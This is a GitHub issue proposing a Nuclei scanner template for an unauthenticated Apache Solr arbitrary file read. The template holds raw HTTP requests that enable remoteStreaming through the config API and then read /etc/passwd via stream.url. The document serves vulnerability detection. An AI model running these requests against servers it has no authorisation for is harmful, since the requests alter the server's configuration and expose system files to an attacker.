### ISSUE TITLE
[nuclei-templates] Apache Solr <= 8.8.1 arbitrary file reading

### ISSUE THREAD

**Issue by z3bd** [projectdiscovery/nuclei-templates#1113]
```yaml
id: apache-solr-lfi

info:
  name: Apache Solr <= 8.8.1 arbitrary file reading
  author: z3bd
  severity: info
  description: An unauthenticated user can read the filesystem as the solr user
  tags: solr,lfi
  reference: |
      - https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ
      - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/1417147780a7b8d4c44a00c79f37abd2111e11c4/_book/PeiQi_Wiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E/Apache/Apache%20Solr/Apache%20Solr%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md

requests:
  - raw:
      - |
        GET /solr/admin/cores HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0

      - |
        POST /solr/{{core}}/config HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-type:application/json
        Content-Length: 82
        
        {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

      - |
        POST /solr/{{core}}/debug/dump?param=ContentStreams HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Length: 161
        Content-Type: multipart/form-data; boundary=------------------------25d19388b98c5d9e

        --------------------------25d19388b98c5d9e
        Content-Disposition: form-data; name="stream.url"
        
        file:///etc/passwd
        --------------------------25d19388b98c5d9e--

    extractors:
      - type: regex
        name: core
        part: body
        internal: true
        group: 2
        regex:
          - '("name":")([^"]*)'

    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
```
